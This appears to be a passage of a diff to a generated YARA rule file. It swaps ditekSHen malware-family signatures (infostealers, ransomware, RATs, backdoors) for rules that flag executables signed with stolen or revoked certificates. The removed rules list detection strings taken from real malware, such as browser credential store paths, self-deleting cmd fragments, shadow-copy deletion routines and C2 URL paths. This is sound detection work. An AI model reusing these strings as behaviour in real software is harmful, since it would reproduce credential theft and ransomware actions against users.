-		logic_hash = "735dcb9e04956863305ca89a43686b8e48e3b20784ae9292cfc40d1c2c09d467"
+		logic_hash = "154d7d814ff0b1c2d85557211dd68d0bd82e9953a9912ac3c26475a1316b0cb3"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Bobik"
-
-	strings:
-		$s1 = "@Default\\Login Data" fullword ascii
-		$s2 = "@Default\\Cookies" fullword ascii
-		$s3 = "@logins.json" fullword ascii
-		$s4 = "@[EXECUTE]" fullword ascii
-		$s5 = "@C:\\Windows\\System32\\cmd.exe" fullword ascii
-		$s6 = /(CHROME|OPERA|FIREFOX)_BASED/ fullword ascii
-		$s7 = "threads.nim" fullword ascii
+		thumbprint = "0ab2629e4e721a65ad35758d1455c1202aa643d3"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GLOBAL PARK HORIZON SP Z O O" and pe.signatures [ i ] . serial == "02:0b:c0:35:38:fb:dc:79:2f:39:d9:9a:24:a8:1b:97" )
 }
-rule DITEKSHEN_MALWARE_Win_Runningrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4E8D4Fc7D9F38Aca1169Fbf8Ef2Aaf50 : FILE
 {
 	meta:
-		description = "Detects RunningRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "161faa8c-614e-5102-bb6d-c1ed4abf8274"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "03a23987-bbec-5072-bea4-56773bdc7d53"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3500-L3536"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L315-L326"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e3cddec792ad95d823190f12970b8e0515b73be4a91f89cbb2bbde2fa1cfde63"
+		logic_hash = "2b440d21183745ac89de56f5ca22cf3f01be3212e20ce80fa67a45adbb6b16fe"
 		score = 75
-		quality = 23
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.RunningRAT"
-
-	strings:
-		$s1 = "%s%d.dll" fullword ascii
-		$s2 = "/c ping 127.0.0.1 -n" ascii
-		$s3 = "del /f/q \"%s\"" ascii
-		$s4 = "GUpdate" fullword ascii
-		$s5 = "%s\\%d.bak" fullword ascii
-		$s6 = "\"%s\",MainThread" ascii
-		$s7 = "rundll32.exe" fullword ascii
-		$rev1 = "emankcosteg" fullword ascii
-		$rev2 = "ini.revreS\\" fullword ascii
-		$rev3 = "daerhTniaM,\"s%\" s%" ascii
-		$rev4 = "s% etadpUllD,\"s%\" 23lldnuR" ascii
-		$rev5 = "---DNE yromeMmorFdaoL" fullword ascii
-		$rev6 = "eMnigulP" fullword ascii
-		$rev7 = "exe.23lldnuR\\" fullword ascii
-		$rev8 = "dnammoc\\nepo\\llehs\\" ascii
-		$rev9 = "\"s%\" k- exe.tsohcvs\\23metsyS\\%%tooRmetsyS%" ascii
-		$rev10 = "emanybtsohteg" fullword ascii
-		$rev11 = "tekcosesolc" fullword ascii
-		$rev12 = "tpokcostes" fullword ascii
-		$rev13 = "emantsohteg" fullword ascii
-		$v2_1 = "%%SystemRoot%%\\System32\\svchost.exe -k \"%s\"" fullword ascii
-		$v2_2 = "LoadFromMemory END---" fullword ascii
-		$v2_3 = "hmProxy!= NULL" fullword ascii
-		$v2_4 = "Rundll32 \"%s\",DllUpdate %s" fullword ascii
-		$v2_5 = "ipip.website" fullword ascii
-		$v2_6 = "%d*%sMHz" fullword ascii
-		$v2_7 = "\\Server.ini" fullword ascii
+		thumbprint = "7239764d40118fc1574a0af77a34e369971ddf6d"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 5 of ( $rev* ) or 6 of ( $v* ) or 8 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "INFINITE PROGRAMMING LIMITED" and pe.signatures [ i ] . serial == "4e:8d:4f:c7:d9:f3:8a:ca:11:69:fb:f8:ef:2a:af:50" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent05 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_09830675Eb483E265C3153F0A77C3De9 : FILE
 {
 	meta:
-		description = "Detects an unknown dropper. Typically exisys as a DLL in base64-encoded gzip-compressed file embedded within another executable"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "a8a72484-42be-5c5c-962b-75bed8acdf39"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "3370886e-6866-598b-b3bf-29c7f2537425"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3538-L3551"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L328-L339"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e8c7c03451bbfcba7a1ab02f8c1320ad50d17d2e990f0e2f89942faea2a1e531"
+		logic_hash = "b0a504ed2a2816602ac378a700567909812650f409626a7b2c1e25cf7f8cb51c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.DLAgent05"
-
-	strings:
-		$s1 = "MARCUS.dll" fullword ascii wide
-		$s2 = "GZipStream" fullword ascii
-		$s3 = "MemoryStream" fullword ascii
-		$s4 = "proj_name" fullword ascii
-		$s5 = "res_name" fullword ascii
+		thumbprint = "1bb5503a2e1043616b915c4fce156c34304505d6"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "James LTH d.o.o." and pe.signatures [ i ] . serial == "09:83:06:75:eb:48:3e:26:5c:31:53:f0:a7:7c:3d:e9" )
 }
-rule DITEKSHEN_MALWARE_Win_Nemty : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_351Fe2Efdc0Ac56A0C822Cf8 : FILE
 {
 	meta:
-		description = "Detects Nemty/Nefilim ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "361269c6-5215-5ecf-869c-3c55ff8387e1"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "dcd82e7a-f235-5ff6-805b-0da7e0c0e385"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3553-L3577"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L341-L352"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dcebcddc472f4fb3bb34c35fc5a5424e54bfc3a262fdae10b189d210217b9b37"
+		logic_hash = "a661adcd9366da7eab0aa8059bbe6236022f7513996603eb06c43a0b38ff4b85"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID:" ascii
-		$s2 = "GOMAXPROCSGetIfEntryGetVersionGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOther_MathPOSTALCODEPhoenicianSaurasht" ascii
-		$s3 = "crypto/x509.ExtKeyUsage" ascii
-		$s4 = "crypto/x509.KeyUsageContentCommitment" ascii
-		$s5 = "DEK-Info header" ascii
-		$s6 = "GetUserProfileDirectoryWMagallanes Standard TimeMontevideo Standard TimeNorth Asia Standard TimePacific SA Standard TimeQueryPerformanceCounter" fullword ascii
-		$s7 = "*( -  <  =  >  k= m=%: +00+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12..." ascii
-		$s8 = "Go cmd/compile go1.10" fullword ascii
-		$s9 = ".dllprogramdatarecycle.bin" ascii
-		$s10 = ".dll.exe.lnk.sys.url" ascii
-		$vx1_1 = "Fa1led to os.OpenFile()" ascii
-		$vx1_2 = "-HELP.txt" ascii
-		$vf1_1 = "main.CTREncrypt" fullword ascii
-		$vf1_2 = "main.FileSearch" fullword ascii
-		$vf1_3 = "main.getdrives" fullword ascii
-		$vf1_4 = "main.RSAEncrypt" fullword ascii
-		$vf1_5 = "main.SaveNote" fullword ascii
+		thumbprint = "4230bca4b7e4744058a7bb6e355346ff0bbeb26f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 9 of ( $s* ) or ( all of ( $vx* ) and 2 of ( $s* ) ) or all of ( $vf* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Logika OOO" and pe.signatures [ i ] . serial == "35:1f:e2:ef:dc:0a:c5:6a:0c:82:2c:f8" )
 }
-rule DITEKSHEN_MALWARE_Win_Qnapcrypt : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_07Bb6A9D1C642C5973C16D5353B17Ca4 : FILE
 {
 	meta:
-		description = "Detects QnapCrypt/Lockedv1/Cryptfile2 ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "3ef5643a-f2af-5d62-8927-e46679e069c2"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "a29590bb-d8f9-5842-81bd-f9a9f7cea642"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3579-L3607"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L354-L365"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "68fc3f0503d82295ffa5bfb49bda8b790142913217775a2812e3965a6c9a1fe1"
+		logic_hash = "faecdcd78bc60f730bfe5a049fd0bd1309b44d185c0cbc81dfc326a162d5fcb2"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$go = "Go build ID:" ascii
-		$s1 = "Encrypting %s..." ascii
-		$s2 = "\\Start Menu\\Programs\\StartUp\\READMEV" ascii
-		$s3 = "main.deleteRecycleBin" ascii
-		$s4 = "main.encryptFiles" ascii
-		$s5 = "main.antiVirtualBox" ascii
-		$s6 = "main.antiVmware" ascii
-		$s7 = "main.deleteShadows" ascii
-		$s8 = "main.delUAC" ascii
-		$s9 = "main.KillProcess" ascii
-		$s10 = "main.delExploit" ascii
-		$s11 = "main.encrypt" ascii
-		$s12 = "main.ClearLogDownload" ascii
-		$s13 = "main.ClearLog" ascii
-		$s14 = "main.EndEncrypt" ascii
-		$s15 = "main.RunFuckLogAndSoft" ascii
-		$s16 = "main.ClearUsercache" ascii
-		$s17 = "main.FirstDuty" ascii
-		$s18 = ".lockedv1" ascii
-		$s19 = "WSAStartup\\clear.bat\\ngrok.exe\\video.mp4" ascii
-		$s20 = "net stop " ascii
+		thumbprint = "9de562e98a5928866ffc581b794edfbc249a2a07"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $go and 6 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MADAS d.o.o." and pe.signatures [ i ] . serial == "07:bb:6a:9d:1c:64:2c:59:73:c1:6d:53:53:b1:7c:a4" )
 }
-rule DITEKSHEN_MALWARE_Win_Alfonoso : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_044E05Bb1A01A1Cbb50Cfb6Cd24E5D6B : FILE
 {
 	meta:
-		description = "Detects Alfonoso / Shurk / HunterStealer infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "2766e74e-c13a-5ce4-8f62-de9cc11e3cf0"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e8dc8963-29c1-5306-bd7d-80ad9e1334d9"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3609-L3638"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L367-L378"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "18e5731ffd70abf2ab70852d54dacc3588dd90cfb4f2ceaee66dfce750535b26"
+		logic_hash = "c433b63f9c875a564f424ecc8e9239701ce8be78cd0046c1eefca8cf732abca3"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		snort2_sid = "920102"
-		snort3_sid = "920100"
-		clamav_sig = "MALWARE.Win.Trojan.Alfonso"
-
-	strings:
-		$s1 = "%s\\etilqs_" fullword ascii
-		$s2 = "SELECT name, rootpage, sql FROM '%q'.%s" fullword ascii
-		$s3 = "%s-mj%08X" fullword ascii
-		$s4 = "| Site:" ascii
-		$s5 = "| Login:" ascii
-		$s6 = "| Password:" ascii
-		$s7 = "| BUILD NAME:" ascii
-		$s8 = "recursive_directory_iterator" ascii
-		$s9 = { 2e 7a 69 70 00 00 00 00 2e 7a 6f 6f 00 00 00 00
-                2e 61 72 63 00 00 00 00 2e 6c 7a 68 00 00 00 00
-                2e 61 72 6a 00 00 00 00 2e 67 7a 00 2e 74 67 7a
-                00 00 00 00 }
-		$s10 = "Shurk Steal" fullword ascii
-		$s11 = ":memory:" fullword ascii
-		$s12 = "current_path()" fullword ascii
-		$s13 = "vtab:%p:%p" fullword ascii
-		$f1 = "chatlog.txt" ascii
-		$f2 = "servers.fav" ascii
-		$f3 = "\\USERDATA.DAT" fullword ascii
+		thumbprint = "149b7bbe88d4754f2900c88516ce97be605553ff"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or ( 6 of ( $s* ) and 2 of ( $f* ) ) or ( all of ( $f* ) and 5 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MUSTER PLUS SP Z O O" and pe.signatures [ i ] . serial == "04:4e:05:bb:1a:01:a1:cb:b5:0c:fb:6c:d2:4e:5d:6b" )
 }
-rule DITEKSHEN_MALWARE_Win_Vidar : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0C14B611A44A1Bae0E8C7581651845B6 : FILE
 {
 	meta:
-		description = "Detects Vidar / ArkeiStealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "d858c463-26d7-5f96-ad9a-cb261a8c61c6"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "a6ebe304-e896-5cb3-8a49-ebffe0525601"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3640-L3650"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L380-L391"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c95c8694c05ff0e8d28f098e668a8ae8fa70130e31af6c0e540c4e5596007e41"
+		logic_hash = "dae6318cf6f8e33e11af5c4b06379f8ef2744e784bb793c78f782b6a6286b84b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\"os_crypt\":{\"encrypted_key\":\"" fullword ascii
-		$s2 = "screenshot.jpg" fullword wide
-		$s3 = "Content-Disposition: form-data; name=\"" ascii
+		thumbprint = "c3288c7fbb01214c8f2dc3172c3f5c48f300cb8b"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NEEDCODE SP Z O O" and pe.signatures [ i ] . serial == "0c:14:b6:11:a4:4a:1b:ae:0e:8c:75:81:65:18:45:b6" )
 }
-rule DITEKSHEN_MALWARE_Win_Babuk : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0B1926A5E8Ae50A0Efa504F005F93869 : FILE
 {
 	meta:
-		description = "Detects Babuk ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "6bb7093f-bbef-5b43-b4f9-be72ae4ef319"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "905a4b5c-3255-5f53-be54-429038378ee0"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3652-L3674"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L393-L404"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5ca5c5106747cf8f4ccd5df4ddbc78321fea3c8f533cb807a704d270eb956007"
+		logic_hash = "78d507f76d44ed982d12c293604d5c4fed14316cbc18473b7131bb89997bad28"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "ecdh_pub_k.bin" wide
-		$s2 = "How To Restore Your Files.txt" wide
-		$s3 = /(babuk|babyk)\s(ransomware|locker)/ ascii nocase
-		$s4 = "/login.php?id=" ascii
-		$s5 = "http://babuk" ascii
-		$s6 = "bootsect.bak" fullword wide
-		$s7 = "Can't open file after killHolder" ascii
-		$s8 = "Can't OpenProcess" ascii
-		$s9 = "DoYouWantToHaveSexWithCuongDong" ascii
-		$arg1 = "-lanfirst" fullword ascii
-		$arg2 = "-lansecond" fullword ascii
-		$arg3 = "-nolan" fullword ascii
-		$arg4 = "shares" fullword wide
-		$arg5 = "paths" fullword wide
-		$arg6 = "gdebug" fullword wide
+		thumbprint = "2052ed19dcb0e3dfff71d217be27fc5a11c0f0d4"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or ( 3 of ( $arg* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nordkod LLC" and pe.signatures [ i ] . serial == "0b:19:26:a5:e8:ae:50:a0:ef:a5:04:f0:05:f9:38:69" )
 }
-rule DITEKSHEN_MALWARE_Win_Nitol : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Bab6A2Aa84B495D9E554A4C42C0126D : FILE
 {
 	meta:
-		description = "Detects Nitol backdoor"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "d545f826-11ff-5d0f-9a95-8232b19d35b6"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "be364465-0cab-59cd-82a2-b7b16f260f34"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3676-L3704"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L406-L417"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c0ddcd6179bea2f3af77ae198e07f55f62884e07a975623ae41bcec163060f89"
+		logic_hash = "a9ecdf1107cba0767ac3fa52c7dd65a13015e4fd735da70b6f1e6dbcfe2f7526"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "%$#@!.aspGET ^&*().htmlGET" ascii
-		$s2 = "Applications\\iexplore.exe\\shell\\open\\command" fullword ascii
-		$s3 = "taskkill /f /im rundll32.exe" fullword ascii
-		$s4 = "\\Tencent\\Users\\*.*" fullword ascii
-		$s5 = "[Pause Break]" fullword ascii
-		$s6 = ":]%d-%d-%d  %d:%d:%d" fullword ascii
-		$s7 = "GET %s HTTP/1.1" fullword ascii
-		$s8 = "GET %s%s HTTP/1.1" fullword ascii
-		$s9 = "Accept-Language: zh-cn" fullword ascii
-		$s10 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)" fullword ascii
-		$s11 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
-		$s12 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
-		$w1 = ".aspGET" ascii
-		$w2 = ".htmGET" ascii
-		$w3 = ".htmlGET" ascii
-		$domain = "www.xy999.com" fullword ascii
-		$v2_1 = "loglass" fullword ascii
-		$v2_2 = "rlehgs" fullword ascii
-		$v2_3 = "eherrali" fullword ascii
-		$v2_4 = "agesrlu" fullword ascii
-		$v2_5 = "lepejagas" fullword ascii
+		thumbprint = "230614366ddac05c9120a852058c24fa89972535"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( all of ( $v2* ) ) or ( $domain and 3 of them ) or ( #w1 > 2 and #w2 > 2 and #w3 > 2 and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NOSOV SP Z O O" and pe.signatures [ i ] . serial == "0b:ab:6a:2a:a8:4b:49:5d:9e:55:4a:4c:42:c0:12:6d" )
 }
-rule DITEKSHEN_MALWARE_Win_Strongpity : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_066226Cf6A4D8Ae1100961A0C5404Ff9 : FILE
 {
 	meta:
-		description = "Detects StrongPity"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "9dcc5edb-5c86-5412-af63-f88d488d5829"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "75db8056-a5da-5db4-a837-84c5cc05f0fc"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3706-L3720"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L419-L430"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e92147966cd68152eb536b805c4918462f72f64280d1b3df800bb41266aa232f"
+		logic_hash = "0b7fa450d143de99650d0364e461178ad4e0b147b19dae53b59928b2a17c9b6d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Boundary%08X" ascii wide
-		$s2 = "Content-Disposition: form-data; name=\"file\";" fullword ascii
-		$s3 = "%sfilename=\"%ls\"" fullword ascii
-		$s4 = "name=%ls&delete=" fullword ascii
-		$s5 = "Content-Type: application/octet-stream" fullword ascii
-		$s6 = "cmd.exe /C ping" wide
-		$s7 = "& rmdir /Q /S \"" wide
+		thumbprint = "8c762918a58ebccb1713720c405088743c0d6d20"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO MEP" and pe.signatures [ i ] . serial == "06:62:26:cf:6a:4d:8a:e1:10:09:61:a0:c5:40:4f:f9" )
 }
-rule DITEKSHEN_MALWARE_Win_Jssloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0E96837Dbe5F4548547203919B96Ac27 : FILE
 {
 	meta:
-		description = "Detects JSSLoader RAT/backdoor"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "ef710c21-5c64-513e-b882-b5768478976e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "83258afe-66e0-56d1-8361-125a1142ffe4"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3722-L3752"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L432-L443"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "91764dabfb40cb51914110de229ddb00cd565078fef83c825f7a86fa502fda37"
+		logic_hash = "2eedcc1d782df3c078c20a275680c2ff724e5b7675890af1335ff22d6138ab25"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$cmd1 = "Cmd_UPDATE" fullword ascii
-		$cmd2 = "Cmd_IDLE" fullword ascii
-		$cmd3 = "Cmd_EXE" fullword ascii
-		$cmd4 = "Cmd_VBS" fullword ascii
-		$cmd5 = "Cmd_JS" fullword ascii
-		$cmd6 = "Cmd_PWS" fullword ascii
-		$cmd7 = "Cmd_RAT" fullword ascii
-		$cmd8 = "Cmd_UNINST" fullword ascii
-		$cmd9 = "Cmd_RunDll" fullword ascii
-		$s1 = "ANSWER_OK" fullword ascii
-		$s2 = "GatherDFiles" ascii
-		$s3 = "CommandCd" fullword ascii
-		$s4 = "URL_GetCmd" fullword ascii
-		$s5 = "\"host\": \"{0}\", \"domain\": \"{1}\", \"user\": \"{2}\"" wide
-		$s6 = "pc_dns_host_name" wide
-		$s7 = "\"adinfo\": { \"adinformation\":" wide
-		$e1 = "//e:vbscript" wide
-		$e2 = "//e:jscript" wide
-		$e3 = "/c rundll32.exe" wide
-		$e4 = "/C powershell" wide
-		$e5 = "C:\\Windows\\System32\\cmd.exe" wide
-		$e6 = "echo del /f" wide
-		$e7 = "AT.U() {0}. format" wide
+		thumbprint = "d6c6a0a4a57af645c9cad90b57c696ad9ad9fcf9"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $cmd* ) or 5 of ( $s* ) or all of ( $e* ) or 7 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PLAN CORP PTY LTD" and pe.signatures [ i ] . serial == "0e:96:83:7d:be:5f:45:48:54:72:03:91:9b:96:ac:27" )
 }
-rule DITEKSHEN_MALWARE_Win_CHUWI_Seth : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5B320A2F46C99C1Ba1357Bee : FILE
 {
 	meta:
-		description = "First sighting on 2020-01-05 didn't include ransomware artificats. Second sighting on 2020-01-24 with several correlations between the two samples now include ransomware artifacts."
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "62af3cd3-59c3-580b-9d66-71fd4acfaf17"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "376aab03-0bc7-5993-bbbd-9bf5b742d29d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3754-L3801"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L445-L456"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e6e3f5e9af093268667f67fec2176a943b35721e9f220804e176c6b5a3bb24e1"
+		logic_hash = "b0a515aa69b5de58cf7d1a496f95038e090cefe511803e7a29332b411a20d19f"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		snort2_sid = "920103-920105"
-		snort3_sid = "920101-920103"
-
-	strings:
-		$cmd1 = "shell_command" fullword ascii
-		$cmd2 = "check_command" fullword ascii
-		$cmd3 = "down_exec" fullword ascii
-		$cmd4 = "open_link" fullword ascii
-		$cmd5 = "down_exec" fullword ascii
-		$cmd6 = "exe_link" fullword ascii
-		$cmd7 = "shellCommand" fullword ascii
-		$cmd8 = "R_CMMAND" fullword ascii
-		$cnc1 = "/check_command.php?HWID=" ascii
-		$cnc2 = "&act=get_command" ascii
-		$cnc3 = "/get_command.php?hwid=" ascii
